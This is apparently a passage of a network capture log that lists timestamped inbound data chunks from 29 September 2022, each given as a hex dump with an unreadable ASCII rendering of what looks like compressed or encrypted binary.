                                                                                                                                                    2022-09-29 12:59:14 UTC19191INData Raw: 4f 14 65 50 77 40 0b 49 69 14 36 56 c1 72 21 a6 5e e2 92 3c ae e5 28 42 8d e9 48 66 fc a2 34 3f 3c fc e9 f8 15 89 c8 07 83 ed a5 f3 5d 8b 32 87 60 4a bc 60 53 ae 56 ab 78 9d b1 d3 54 f3 04 62 51 28 a2 34 fd ad 04 d9 4d 9e 0d 2d ac c2 bb 16 4b 43 ea 38 3a 60 12 e5 0a 8a 53 fe d9 b2 2d f2 a7 3d 82 ab b3 b9 9e cd 8a f8 c9 39 f5 65 2f 9d 4c cb 3b d0 09 db 83 2b 40 1e c6 da 63 6a 84 96 69 0a e5 ba 7e b8 61 2e 43 19 52 13 60 57 a3 be 56 bf 4c 8c 78 3b c9 af 2d 85 d9 38 56 ee 30 c7 be 3f 2e 36 a6 10 9b cb 8c f2 01 86 cb 0f c1 18 df 00 fb 1e 3f 56 d8 e1 16 52 f1 a4 2e df dc 67 b9 5b 3d 57 c2 7e ab a1 75 a5 24 c5 1e 59 c2 5c 30 81 be 4d a6 62 0a ca d5 95 cd 72 1d b7 28 82 60 dc 43 fc 44 f5 1f 06 8e 28 1a b0 a3 a5 3d a1 d1 2c 7c 7c 74 69 41 ad 35 f9 c5 da 1c ad 65
                                                                                                                                                    Data Ascii: OePw@Ii6Vr!^<(BHf4?<]2`J`SVxTbQ(4M-KC8:`S-=9e/L;+@cji~a.CR`WVLx;-8V0?.6?VR.g[=W~u$Y\0Mbr(`CD(=,||tiA5e
                                                                                                                                                    2022-09-29 12:59:14 UTC19207INData Raw: c9 26 36 cf 74 5a c0 55 67 6a 88 f4 c4 20 6c d0 bf 37 fd 66 9a c1 04 80 fa 3a 5c 5b 17 b1 5b 04 fa 15 63 e9 bf 87 60 d1 6b 9b 7a ef 65 78 33 49 57 64 5a ae 15 9a 5d 4f c7 37 d3 58 8f 66 5d 89 18 d2 ee dc e1 37 b5 e8 5f 35 63 81 40 f9 92 1b 33 f7 3b 9f be 4b f3 aa 35 3f b1 a4 e9 44 dc ff 49 dd 94 49 22 ed 7f 5e 05 a2 0d ab 30 54 56 8f 37 32 1f 2c 9a ea 27 30 e4 71 e0 b5 20 fe f1 37 86 c1 71 73 4d 8b 74 23 30 f3 06 ac 72 5e f1 47 18 45 fd 64 e4 31 34 54 5c 57 8c 74 23 e3 e2 65 39 b2 78 b1 3e a3 23 08 07 ef ac 82 84 78 9e d6 4b 3c 02 e9 6d 48 86 4c fe 1a 45 4b c4 84 c3 94 2b b4 3f fd 06 da f5 08 92 47 90 09 63 5b e3 5b 27 da 51 90 00 4b df c6 09 44 d0 5c 5a c2 0d 84 36 7f cc c2 8a b0 5c d7 e0 e7 56 a2 91 29 dd 69 24 ee ae 6e f7 1b 65 e6 7d 5d 50 ce 41 74 ae
                                                                                                                                                    Data Ascii: &6tZUgj l7f:\[[c`kzex3IWdZ]O7Xf]7_5c@3;K5?DII"^0TV72,'0q 7qsMt#0r^GEd14T\Wt#e9x>#xK<mHLEK+?Gc[['QKD\Z6\V)i$ne}]PAt
                                                                                                                                                    2022-09-29 12:59:14 UTC19223INData Raw: 19 24 c4 1a c8 bb fa 66 32 a9 89 3f 09 f5 d4 b9 29 85 f1 15 e7 aa 0c e8 28 8b 6e 76 03 36 a2 d6 6d 24 fc b8 3c 52 01 a0 1a cc 13 44 09 e1 96 ce 85 7d af c3 6e e7 7a bd 30 91 1b ba 0f 54 ea 31 ae 0a 04 0a 31 59 6e 5a 05 e2 8a c9 42 e7 8a 96 65 e8 91 79 a7 b2 4d a4 12 6c 0e 93 6f 29 f1 09 82 02 8f 24 7d 89 44 dd df 7b 6a 9b 00 30 cb 2b ee 0d 57 5e f7 bc 9b d8 9f 74 ed 54 60 9c 7e 07 4a 17 be 77 ca 49 ac 61 bc 24 3d b3 5a b6 18 46 eb 44 12 d2 45 f8 c8 e0 fd a4 67 86 f2 7c eb 98 a5 c1 79 69 f8 51 fb 80 f2 06 c6 af 9e 74 27 be 71 94 15 7d ab 66 66 26 06 e6 97 3e 8f 12 18 88 68 90 33 0c e6 48 fd 51 eb ca e4 d7 e7 5c a4 c4 5f e0 a4 ac 67 17 c7 47 d9 c5 2d 8f 26 68 f6 47 9f 31 18 d3 bf 69 3e 3c 9f ea dd f2 dd 77 f0 19 db 9c d7 4c d3 4d d3 3c 0e 73 ab 3c 46 8b 89
                                                                                                                                                    Data Ascii: $f2?)(nv6m$<RD}nz0T11YnZBeyMlo)$}D{j0+W^tT`~JwIa$=ZFDEg|yiQt'q}ff&>h3HQ\_gG-&hG1i><wLM<s<F
                                                                                                                                                    2022-09-29 12:59:14 UTC19239INData Raw: 10 04 ea 22 5d 7f 71 38 7c 12 6b c6 e2 10 74 04 0d 36 a4 f1 f1 8b c3 dd e9 ca 78 b9 74 30 ac 39 88 83 14 21 da 29 52 ff 74 97 71 f6 4d c0 1e 44 53 6e d1 65 59 f5 9d 26 84 ce e2 01 7b 98 af 81 9b af b4 86 2e dd 5e dc d2 c0 27 f1 c7 80 9f bb b7 e8 32 02 a7 71 12 34 f7 4f ec 07 3c 72 2e 56 7f 68 23 5c c1 1a 60 24 58 06 f1 61 40 99 54 57 fd ed 0e aa 8e f7 72 dd 60 6d 14 27 b4 52 8a d4 fb 31 8e 37 b7 a8 a3 17 3e 12 b8 09 31 d2 b7 a7 b0 bf 78 3d 9f 00 40 22 75 57 3f a1 b5 c5 51 eb 1b ad 97 3c fa 74 e1 e2 89 43 7f 88 06 fa 60 e6 0b 38 30 58 20 c3 13 b0 3c 80 dd c7 71 be 38 92 71 1f ce d8 ac a5 a0 72 52 16 88 b8 0b 1f b4 ea c8 b8 b4 cc c8 20 c3 fb 23 4e a1 48 46 b0 18 b9 2b d0 91 cd 5e b7 a1 d5 ee a7 53 80 92 22 c5 79 fa e0 23 40 21 c7 09 7e bb 21 4e 22 68 c4 d5
                                                                                                                                                    Data Ascii: "]q8|kt6xt09!)RtqMDSneY&{.^'2q4O<r.Vh#\`$Xa@TWr`m'R17>1x=@"uW?Q<tC`80X <q8qrR #NHF+^S"y#@!~!N"h
                                                                                                                                                    2022-09-29 12:59:14 UTC19255INData Raw: 98 40 99 bd 9c 86 1b c1 d4 a2 63 86 cc 68 21 57 c3 aa 1e 67 5a c3 62 44 a9 c4 8b e5 4b db 29 3c d9 d4 1c 52 4c a1 e3 83 31 fb ed 7b 11 04 89 8a 1c 9f f2 3e 43 c9 70 f7 a7 63 e5 d7 8c 68 27 3b f2 d6 65 50 2b c1 ea e1 80 49 1a a9 e9 2b 42 cf 1e be a6 82 66 00 63 35 ea eb 19 d3 dd 58 aa 83 ca 73 78 c8 8b f0 11 f5 18 71 3c 44 2c f7 27 f1 00 80 c0 8f 6e a5 82 45 d5 e6 aa 84 01 6c 88 32 3d d8 2e 67 ae 75 64 41 0e d4 f4 af 3c f5 8f 54 56 46 97 44 9a ff 23 9d 47 66 06 d5 26 df 94 6a d8 57 4d f5 50 c7 e7 61 4d f5 28 a3 17 4a 78 1b e1 8d e1 50 63 0d d7 6b ab a1 02 e1 e0 61 10 26 4d 0d ad 71 30 c0 35 31 49 0d 0f 37 02 ce fa bf fc 45 56 fc 82 a7 ec 43 cf 3c a4 64 9a 60 50 2c a0 65 73 22 6c d0 a9 f2 71 f7 df a0 4a a5 2c 44 75 bf a7 16 50 49 e9 cb cf 23 ea 5f 05 5d e4
                                                                                                                                                    Data Ascii: @ch!WgZbDK)<RL1{>Cpch';eP+I+Bfc5Xsxq<D,'nEl2=.gudA<TVFD#Gf&jWMPaM(JxPcka&Mq051I7EVC<d`P,es"lqJ,DuPI#_]
                                                                                                                                                    2022-09-29 12:59:14 UTC19271INData Raw: 16 4b 3c da df e2 4c b3 8b 50 74 39 62 b2 c3 be 47 6c f8 2a 1c 87 66 ad ab 33 8a 54 2f fa 9c bc 08 d4 05 c3 6a 79 2d fe 93 b5 82 fc a5 ff a7 e1 8c e1 e3 91 7a 33 d1 c4 dc ad e1 f6 3f a6 69 df 95 68 25 89 ef da 4d 14 44 19 72 7d 34 91 fd e0 52 74 de b7 09 3b 46 bb fc f6 85 cf fc 71 62 62 22 f6 2a 1f f1 d7 0e 8d b6 eb 95 0c 95 a0 18 46 eb 5c 9b e3 a0 a4 2d 7b 0f c2 a8 87 8a f0 3f bc 69 ee 7a 1b 85 c2 e0 1c dc 1f 11 ea d1 84 ad 48 3a fa 36 90 d7 50 95 ae dc c0 cd fc 30 7b 7b d7 53 e2 99 73 3f e3 43 c1 78 db 1e 3d f1 92 38 2a ee f1 51 4a 53 2a 8b d5 12 4e bd 57 70 24 96 af 93 be a5 ab 52 9d bd 94 19 be 49 8f 90 22 4e 3a 1e 81 68 4a e2 62 ff 85 c5 5b 0e 33 50 2e 7a ec 16 7b e1 40 73 6a be 50 7e c8 62 ac 23 75 6c 6c eb bd 17 81 6a 3a 26 a9 4f be e7 b2 56 08 8f
                                                                                                                                                    Data Ascii: K<LPt9bGl*f3T/jy-z3?ih%MDr}4Rt;Fqbb"*F\-{?izH:6P0{{Ss?Cx=8*QJS*NWp$RI"N:hJb[3P.z{@sjP~b#ullj:&OV
                                                                                                                                                    2022-09-29 12:59:14 UTC19287INData Raw: f6 70 54 22 b3 a2 f3 b1 92 29 e9 0f 3a ef 98 32 72 7a e9 db 12 59 1f 1c fd 70 19 ad 59 9c 6d d7 cb 4f ad e6 9a f2 59 96 96 2e c7 f6 81 8b 9c 1e 19 ee 85 6d ed ab 84 cc da 9b b1 7a 09 a1 d3 50 99 55 ca 2b 3b 80 88 69 da 6c 70 9a 58 55 1d 3f 0e e4 4e ce e7 6d 0d 0a 6e 54 cc e3 6e c9 1e fc 15 43 c9 bb e4 40 35 6c 84 de a4 1c 4f 76 c9 87 9a 2e fe c8 bf 0b 2b 82 0b c4 2b 26 d1 ac 12 d1 0d 7c 9a 00 f4 d8 d6 86 6d cd d2 c5 d4 b7 7b 22 c0 53 75 69 dc 30 5e ac a5 c3 e6 66 11 7e bb 6f 8e 6e 09 08 e9 76 89 63 79 fc 9a 26 00 05 44 ce 23 2c fb e7 00 b5 87 60 f3 f2 d8 06 0d 67 51 e7 c7 16 ba 46 ec 99 57 5b cf 77 51 4a 52 f5 61 23 db e9 c6 78 a2 e8 1e c9 bd 51 13 c2 13 54 8d 79 a5 6b b0 64 a5 66 0d 7d 1b 73 e4 7c 7d c5 4d 0b ae 9e e7 f7 df cd 91 ee 40 0e 43 e7 4b f4 bd
                                                                                                                                                    Data Ascii: pT"):2rzYpYmOY.mzPU+;ilpXU?NmnTnC@5lOv.++&|m{"Sui0^f~onvcy&D#,`gQFW[wQJRa#xQTykdf}s|}M@CK
                                                                                                                                                    2022-09-29 12:59:14 UTC19303INData Raw: 4f 57 25 a1 fc 98 90 de 34 79 54 9d 88 d3 45 ee 02 d7 eb 58 34 70 8a 28 49 e7 0c b9 4c 6d fb 41 9f 04 3c 86 6e 22 7b 94 88 a5 da 07 9e 0e ed cd 7b ef 45 ff e0 c5 e4 54 09 a6 0f 5a 7c 4d 54 66 8a 39 f5 84 52 b2 e3 84 e0 06 d6 77 28 3d db 1d 95 90 0b 61 1d 35 db 64 68 75 35 49 a9 86 80 08 d0 a6 b4 49 43 97 2d 3a 41 73 66 ec 78 aa 54 0b b4 f7 d0 df 37 50 18 dd b6 56 c7 16 f9 8e 3f ab 16 8b e0 4f 69 f6 3b f4 68 97 3c 10 06 c6 5b ee 99 ad ba 46 6a fe 29 ab 28 c4 c1 69 3c 3e 02 93 61 03 69 b0 16 e7 c1 ea a9 58 e1 34 d2 d7 a9 e7 6f 35 3b 9d d2 08 a3 c1 0b bc af 41 02 cc 9c bf d8 d4 89 22 07 ec ea 42 37 2f e0 37 f5 5f b9 20 6c e7 90 0b 14 05 35 2e 0d 4a 23 89 12 95 02 45 cf aa 0e 1e 95 81 94 a5 c4 7b f7 d3 10 c8 59 1e 06 d6 38 c4 2e 0a 05 6c 97 42 44 53 89 cc 03
                                                                                                                                                    Data Ascii: OW%4yTEX4p(ILmA<n"{{ETZ|MTf9Rw(=a5dhu5IIC-:AsfxT7PV?Oi;h<[Fj)(i<>aiX4o5;A"B7/7_ l5.J#E{Y8.lBDS
                                                                                                                                                    2022-09-29 12:59:14 UTC19319INData Raw: fd 00 74 33 74 93 b4 fe 30 83 a8 cc 59 c0 ec 03 46 85 f0 c9 58 20 a2 1c f8 9d 8e 05 77 d9 ae 08 21 4e a2 e1 6f 0b 6e 8d b9 a5 b5 f0 3e 15 4e af 36 dd f2 93 82 d6 4f fe dc 93 6a aa a7 36 b2 1b 8b ee e6 6e 9a 2e 81 e2 51 f1 6d b1 4f 25 8e ba 4f 73 57 24 ab f5 6e 19 fd 11 58 c7 70 8a 29 67 9f 98 81 7b 17 a0 3e d8 52 c5 ac 64 03 b7 35 e9 60 51 c1 64 a0 a0 13 81 60 6d e3 54 6b 77 5a ba ca 49 8c d5 c2 03 9f 96 cb d4 b7 fa 00 8e 5d 4f 63 c4 59 75 19 93 aa 04 92 4f 56 56 d8 60 6a 65 f8 70 13 0c 98 57 78 42 d8 2e 1e fc d4 bd 37 05 f7 93 5b c9 c8 76 45 22 ef 95 b0 80 07 8e 37 7a 65 6d e5 2f 33 92 39 14 46 1d 5b d3 ff 47 fe cf 81 fb e0 96 b1 1c ef 9e c7 8a 47 4e b2 aa 4f 4e 75 83 56 26 4b 82 de 07 18 24 22 d1 64 65 7c db 49 01 6c 46 25 f8 cb 47 93 67 f4 7f d2 03 a8
                                                                                                                                                    Data Ascii: t3t0YFX w!Non>N6Oj6n.QmO%OsW$nXp)g{>Rd5`Qd`mTkwZI]OcYuOVV`jepWxB.7[vE"7zem/39F[GGNONuV&K$"de|IlF%Gg
                                                                                                                                                    2022-09-29 12:59:14 UTC19335INData Raw: eb 74 96 bb 85 51 8f e7 53 b1 be e0 3b 89 f1 a0 02 15 64 67 bd e9 c3 3a d8 33 11 df 7c 81 5a c9 d0 ed 1c 2d e8 86 0e ab 27 88 59 08 dd 6b 4b e1 86 43 f5 1f 5c 23 6e d8 16 66 26 36 92 b6 c8 c5 09 09 72 71 e3 cc ae 53 9b a2 ba c9 77 93 9c c6 e7 bd 4a 02 fa 68 c3 41 5c ed 3f 19 d0 92 1a 81 27 c9 8d 5b 9d f9 27 8d 61 7b ad 1b 22 39 aa b7 06 3c ff 0c 5a a3 0e 3a ca ae d3 06 fb 78 52 79 f5 61 6b 9b f9 40 38 dd 2c b0 57 01 3a 86 96 b9 54 24 7d 51 6f f4 51 04 c2 d0 e1 96 d9 aa 00 ae 2b ff 15 f6 0f df a7 28 0e f2 2e 7a 93 5d 32 56 e9 da c6 cd d5 c6 2a 5e 9d dc b0 ce df 8a 49 9a 1b 56 c5 c3 3c 1d 3b a4 98 87 dd d9 e5 22 7f 72 fd 4b 69 54 e7 0c 5c 16 9f ba f8 bc 45 d9 64 6b 5a 70 3b 8b 8c 12 ec fe e0 19 ae 35 8e 9a bc 37 41 03 22 cf da ea 6b 0d 8d 38 a4 55 c9 6c 3c
                                                                                                                                                    Data Ascii: tQS;dg:3|Z-'YkKC\#nf&6rqSwJhA\?'['a{"9<Z:xRyak@8,W:T$}QoQ+(.z]2V*^IV<;"rKiT\EdkZp;57A"k8Ul<
                                                                                                                                                    2022-09-29 12:59:14 UTC19351INData Raw: 19 86 34 b3 59 80 03 d3 e2 af bb ba 13 31 74 1c 6d 5a 1b 1d 93 f6 a1 5f b5 fd 35 9e be 7c 3c 10 21 28 90 5c c6 c9 57 3b 6e 68 9d 9f 45 85 66 1a 5b 94 01 a4 c1 f8 c3 fb f7 9c 89 43 35 38 b1 d1 99 7b 1c 34 43 1c 78 61 f4 85 62 74 c4 1d b4 0a f6 b5 f9 21 cf de 4c 58 84 b2 80 e5 47 09 c7 82 c7 bd 53 29 ad 05 b2 1a 04 2f f4 c7 51 68 23 f0 54 b1 00 95 85 e3 dd 92 2a 30 de 53 50 9f 82 c3 00 9d d2 c5 a4 f7 33 16 94 ac 2f a0 8d 38 2f 74 bb 6a e0 73 0e 51 ac b4 13 4f 3b 35 6c f3 72 aa 33 a0 32 84 68 3b af d6 01 bc 22 a6 da b5 07 b4 e2 ec 70 f1 f3 6d b3 b8 29 64 08 75 e5 0b a3 7a 9a cf ac 61 70 e9 76 0c b2 6e f4 e4 48 3d d9 c0 b1 fd 91 d3 76 71 e2 6e 9c a7 5c 38 d1 ff 82 10 54 90 48 db 26 70 a2 c8 0e 97 2f e9 5f 9b 49 e3 11 6f 58 b6 ed 9d ab 53 af a5 65 94 10 66 fb
                                                                                                                                                    Data Ascii: 4Y1tmZ_5|<!(\W;nhEf[C58{4Cxabt!LXGS)/Qh#T*0SP3/8/tjsQO;5lr32h;"pm)duzapvnH=vqn\8TH&p/_IoXSef
                                                                                                                                                    2022-09-29 12:59:14 UTC19367INData Raw: fa 22 56 12 a2 81 d2 be 1d f2 37 a5 b5 66 25 0a e0 04 22 99 02 b8 61 87 0a aa 4d 30 04 54 61 59 ca 36 3e 37 09 ea ac e0 a2 f5 cf 87 30 3f 8c 58 06 3e 75 34 5b de ce 20 1d 16 76 c4 98 74 69 f7 b5 fa cd d1 8a 66 80 66 27 96 a5 48 38 a4 20 84 5f a7 3f 71 eb 99 63 bb 20 14 3d 09 78 65 84 26 6b d1 e2 ce 52 a4 26 ab d6 e5 b7 31 16 3e d6 68 26 7e f2 a1 75 7d 42 75 67 b9 92 38 7c 6d c1 98 23 10 e5 2a 90 86 d7 33 8f a6 37 95 68 0f e8 87 7d 32 a6 c9 87 0e bb 9e b7 ab e8 04 da df c7 4f 29 52 87 9c 26 78 96 d9 06 ae 32 32 29 57 22 7e f4 53 87 1f 16 e6 6e 78 e0 60 91 d9 b1 81 69 d4 93 b3 78 66 dd 25 74 f2 c1 50 3a c9 62 55 33 10 d6 43 5b b0 62 0d ef c3 ec ed 2e e0 0c 4a f7 0c 09 db fd 0a fd bc 86 65 61 cb 69 31 a9 b4 e4 ed d5 68 8e a3 4e bd 2e c0 bb 4e 65 26 71 07 9f
                                                                                                                                                    Data Ascii: "V7f%"aM0TaY6>70?X>u4[ vtiff'H8 _?qc =xe&kR&1>h&~u}Bug8|m#*37h}2O)R&x22)W"~Snx`ixf%tP:bU3C[b.Jeai1hN.Ne&q
                                                                                                                                                    2022-09-29 12:59:14 UTC19383INData Raw: 69 21 4a a7 2b e4 22 60 6a c8 0f d2 84 9a 41 83 de 0c 91 b5 92 bf 2f 99 c4 95 cd a7 d2 e5 70 eb 16 6b d1 56 21 5e 34 58 ab 11 ad 5b 60 37 46 f6 4d 12 a3 63 c1 1d 48 d8 f9 1f 4f 4d f5 8c 86 a6 8d 5b 52 ed fc a7 80 45 3c 58 88 f5 a7 c1 70 63 11 a7 85 40 29 0e dc cb 07 d7 10 04 1d e0 0b 67 ff 0d b3 ed 5a 2d dd 69 09 cb 30 0f 64 04 6b be d7 9c ee 2d 3a 4b 56 b6 40 8f cc 3c 6b 3f ec 2a 1d e7 d7 40 02 7c b9 a3 57 8d d8 9c f1 ad 03 0b 71 e8 08 2c e5 27 41 71 3a 62 44 44 e5 a8 84 0c 4b cb 9f 75 20 99 b6 9c 07 b1 d6 80 6b d8 b8 81 c1 76 e5 ea f0 8c 43 b6 53 a0 ef 09 da 07 74 4b 50 5d 1c 01 51 51 2f 7c 7a 72 f4 2c 19 af c0 c8 cd f7 9f 80 9f ed db 50 99 bd 7a a6 45 cd 83 f5 d3 17 b3 96 c4 57 f1 32 75 09 91 12 ba ad a8 a7 20 d8 71 54 13 13 ed f5 89 26 6b 5a 9f dc f7
                                                                                                                                                    Data Ascii: i!J+"`jA/pkV!^4X[`7FMcHOM[RE<Xpc@)gZ-i0dk-:KV@<k?*@|Wq,'Aq:bDDKu kvCStKP]QQ/|zr,PzEW2u qT&kZ
                                                                                                                                                    2022-09-29 12:59:14 UTC19399INData Raw: f0 d1 09 ab 96 4c 64 e0 04 5f 19 98 bc 61 d4 64 5c 08 2c 4b 4d b7 a3 8d 96 63 15 00 f7 30 c7 05 c0 a5 ed 34 79 a5 fe f5 57 00 d7 73 ce a4 21 d9 bf 50 2e a5 1d 8c 70 e2 06 bd c9 6a ee d7 e8 bc 17 71 2d a3 77 50 7d 05 eb 99 af 6f ee 69 21 5d a0 51 07 6b 63 ab d9 78 e0 07 fd 99 57 9e d6 61 ab 07 3c 65 6a dc ee 4d 98 13 02 35 47 49 de 19 2f 5c 3b 8b 4e 5b 97 ba 47 bb 8f b2 56 e8 8a 3a f2 8e 1d 4c 55 bf 50 1a 84 e7 88 3a ff 11 d1 f2 52 5f 3f a8 be 71 e3 1d c2 ad 1b ae 78 55 f0 13 4a b4 00 26 28 64 42 7e de a8 10 ea a6 ce ce 73 8e bf d1 03 9a a2 2b e9 a8 44 ec 9c d3 e6 ce fb 04 b0 8b 2c 75 cc ec e5 61 17 f5 6f ec 5f 10 49 f2 25 d5 f4 3a 2a c1 7d 93 4b da 2e a2 f1 4b 47 26 41 42 7b 3e 83 51 3a 44 d9 2e 1e ff 7b 36 4e 9f 14 a1 4e 67 75 4b 56 b2 d2 7d 2f 9f 19 c4
                                                                                                                                                    Data Ascii: Ld_ad\,KMc04yWs!P.pjq-wP}oi!]QkcxWa<ejM5GI/\;N[GV:LUP:R_?qxUJ&(dB~s+D,uao_I%:*}K.KG&AB{>Q:D.{6NNguKV}/
                                                                                                                                                    2022-09-29 12:59:14 UTC19415INData Raw: e4 d0 16 b6 96 8c c0 54 4f 17 b0 ff a4 c4 4a 61 3d 2a 1a 4f 5b f2 b2 59 a6 1b bb 11 f4 59 93 a1 0a 3e 44 cd 23 53 14 fe c3 b7 79 04 4e 4e 37 ac ee 46 a5 e3 bf 2e a9 94 ba cf ae c5 60 03 75 12 f2 30 32 9c 72 2b c8 a9 3b 51 c5 c4 16 82 7a 3b 81 8d ac 90 89 e3 88 b8 6f 4e d0 42 ae ea 84 5b df 9e a7 c3 01 92 fd 19 1c 70 a3 02 94 20 08 9f d3 b8 08 b4 78 10 e1 77 d2 a1 c3 d1 90 2e 76 98 e3 91 b4 44 6c ae 93 ba 60 f3 85 de b7 e1 79 15 12 ae 88 c8 0c 5a 7e 50 62 50 a8 de ba af e6 2e 19 39 81 40 66 59 1b af 2b a1 a3 92 49 c9 58 8a ea e9 a6 14 e3 28 c9 af d2 e1 f7 f5 81 9c 9b 17 8a 4d a5 5c a5 11 1b 04 e1 7a b5 25 11 ae 26 cb 95 1f c4 49 c1 c0 51 0d f3 2d ab e6 40 82 96 43 37 d5 73 1e d8 90 60 77 54 08 d7 4f 66 16 2a 02 68 d5 6e 14 fa 9c b0 e0 7f 31 53 a1 13 8e 9c
                                                                                                                                                    Data Ascii: TOJa=*O[YY>D#SyNN7F.`u02r+;Qz;oNB[p xw.vDl`yZ~PbP.9@fY+IX(M\z%&IQ-@C7s`wTOf*hn1S
                                                                                                                                                    2022-09-29 12:59:14 UTC19431INData Raw: 03 90 41 62 2d 3a 56 ef 6f c7 b4 5f 02 2f e1 40 ef 64 8a 9c 3c 6f aa 5e b5 cb 2b 96 8b 59 e8 48 f9 c6 2b 76 05 25 19 0e ac 0d 33 a4 14 4d 0d 7e eb 74 83 09 62 fa 68 02 08 00 eb 64 20 b8 4d df dd 67 07 63 c7 da 89 a1 5b 01 bb 4a ce 96 4f cd 7e 54 a6 dd 03 1e bc 5b cb 39 a7 13 7e 94 0a 93 52 d5 6f fa 31 eb 01 1a 49 f8 f1 d6 87 b1 7b 23 ad 69 c8 ef b6 3a b4 0b db 0f a8 34 ca 2c ef 56 69 e1 44 c2 ed 02 2d 37 5f 06 ea 0a 0a f3 c1 72 78 9f 70 41 d8 54 0b 41 f2 61 84 f8 05 d6 b0 41 22 6d 33 c7 4e fd 68 38 2e 98 ea ce dc 9f 21 57 9b 2d 10 79 0a 05 0d 3e 1d 5e 04 08 52 fd be d8 ce 30 70 3b 8d 57 19 f6 65 75 e0 12 e7 f7 a8 25 be 4f ae b1 9b 05 3e db 00 38 ee 60 14 39 a2 0b 74 e1 6e 9a 1e 23 d4 54 3e 05 4d b7 af 1a ed 0f 72 13 8c e5 a0 41 98 1d f4 0c d0 72 6a 16 8b
                                                                                                                                                    Data Ascii: Ab-:Vo_/@d<o^+YH+v%3M~tbhd Mgc[JO~T[9~Ro1I{#i:4,ViD-7_rxpATAaA"m3Nh8.!W-y>^R0p;Weu%O>8`9tn#T>MrArj
                                                                                                                                                    2022-09-29 12:59:14 UTC19447INData Raw: ac 35 8d 11 eb d6 28 9f 65 a4 be 25 d5 34 b6 d2 b9 36 84 d3 25 32 f8 b9 c0 94 97 fd ca 19 c3 bb 1f b7 20 b9 23 a3 03 f1 35 47 01 87 9a 13 02 d4 c6 c3 10 7e fa 9f 83 19 c7 28 e0 4e 20 b9 42 d1 d2 32 ca 13 df f9 c5 9b 82 3c 6c c8 20 db cc 1b 21 a3 f2 92 b2 37 58 fb d0 38 d5 d4 59 7a 29 13 85 e1 e4 0a 1c 9a e1 cf 2e 0b 25 df f1 ac 65 73 08 93 da 98 1f 26 33 40 cb 90 cf 04 f6 e6 51 05 42 8e 9a 38 37 73 07 58 aa 23 21 90 16 87 3b 8a 34 f4 a7 50 ff de 2b 3b be 37 b2 cd 9f d9 14 3a d4 f9 d7 95 eb 3d f9 26 65 a1 07 45 23 f3 5d 7e b7 a0 2c a1 30 83 8e 4c d9 33 7b ee 1d ac 9b d7 2b b7 70 4d b7 ae 61 ee fe 66 94 de 56 f2 70 36 c8 ee 05 85 86 55 30 4a be 38 79 91 1d 93 bf 56 5c 9e 58 20 65 ae 4b c2 01 1e 66 86 53 33 1a 79 48 5d 74 75 8e fe 8d 5d 8a aa d9 4a 6c 27 bb
                                                                                                                                                    Data Ascii: 5(e%46%2 #5G~(N B2<l !7X8Yz).%es&3@QB87sX#!;4P+;7:=&eE#]~,0L3{+pMafVp6U0J8yV\X eKfS3yH]tu]Jl'
                                                                                                                                                    2022-09-29 12:59:14 UTC19463INData Raw: 52 98 29 d9 0d e8 67 9f 37 bd c0 b4 1d 78 f8 63 76 b4 06 71 da d8 b5 4a c4 c6 8c 24 ef 0a 7d 1e ed 98 ba 4c 55 21 d8 a2 d1 c2 90 51 41 a3 07 6d 65 83 d7 f7 d9 7c 6a fc 3d f2 62 ec 5e eb 49 cc 24 c2 a5 97 b0 02 64 c3 9b 39 12 3b 64 3f 2c ce 73 31 5b 44 16 ef 4b db 41 43 70 a7 6f f0 14 9a b8 65 ab da 1f 7c 16 da 4b f1 ab ac 64 5a 11 fc 32 56 3c 7a 29 4b 4c a3 9c cf cb 36 74 09 c0 14 e5 a5 c8 ac 30 e2 12 b4 02 ab c3 e4 b0 13 7e 3c ed 48 a2 b3 2a 34 e8 0a f9 0b d3 ac e1 de cd 8e c1 65 be cd 9b d5 e4 48 a9 8d cb e7 6a 31 2d b6 bd 75 74 0a 9a d4 64 04 0b 65 61 f6 d5 49 0e 82 72 fb d4 17 65 15 b8 f9 58 7c 13 00 0f 8e 2c 86 28 ed 5d cf cf ba 5a ea 95 01 ae 40 f0 bd e4 d0 8d d2 fa 49 10 d7 53 96 a6 c9 a2 18 5f 5a 1d 45 37 6b d9 11 67 27 48 16 4a a1 3b 86 dd f9 c4
                                                                                                                                                    Data Ascii: R)g7xcvqJ$}LU!QAme|j=b^I$d9;d?,s1[DKACpoe|KdZ2V<z)KL6t0~<H*4eHj1-utdeaIreX|,(]Z@IS_ZE7kg'HJ;
                                                                                                                                                    2022-09-29 12:59:14 UTC19479INData Raw: 68 07 32 aa 39 c0 c6 07 f7 19 92 ab 5f f1 95 a8 46 99 68 39 e1 41 ed 03 71 64 f4 15 b4 ef 84 d1 c9 4f b1 6e 33 9b b7 53 39 2b a2 32 aa 45 0b 5b 5d c9 73 bb 37 d7 bd a1 a4 67 9c 44 27 e3 d5 8c 83 d7 b0 90 05 0d 95 d0 9c 81 f8 a0 49 0e 9d b7 cf 54 50 29 71 5d 52 40 36 ab 0b 8e 66 94 8f 2d b4 5f fa eb 43 bd b8 18 c6 1a 2d 6e 6b fe b9 7b 1f df c0 e8 e9 22 d4 01 69 34 c2 f6 6a bd 95 fa a1 20 b0 e8 13 55 56 f3 56 c8 e2 07 76 3a e1 2a c3 56 75 aa 20 92 92 4a 8e f1 f9 ee 68 b2 b9 82 02 24 23 cd 50 50 d2 db 3d 16 0c 24 9a 82 e4 42 ba 0b 34 b9 ca 0e d9 37 a9 5b 84 1f 54 ce 2d 81 dc 85 85 8c 69 9f d1 dd 8e 74 8b ae 8c 93 08 ad aa 5f 26 41 7b 90 e4 59 5c 1d 46 86 00 5c 26 cd 29 d9 b5 c0 c9 38 f0 34 fa 45 47 45 a3 d3 5d 6f ce 35 2b 98 34 9d 1e c5 f4 e6 1e 6c dc bc 80
                                                                                                                                                    Data Ascii: h29_Fh9AqdOn3S9+2E[]s7gD'ITP)q]R@6f-_C-nk{"i4j UVVv:*Vu Jh$#PP=$B47[T-it_&A{Y\F\&)84EGE]o5+4l
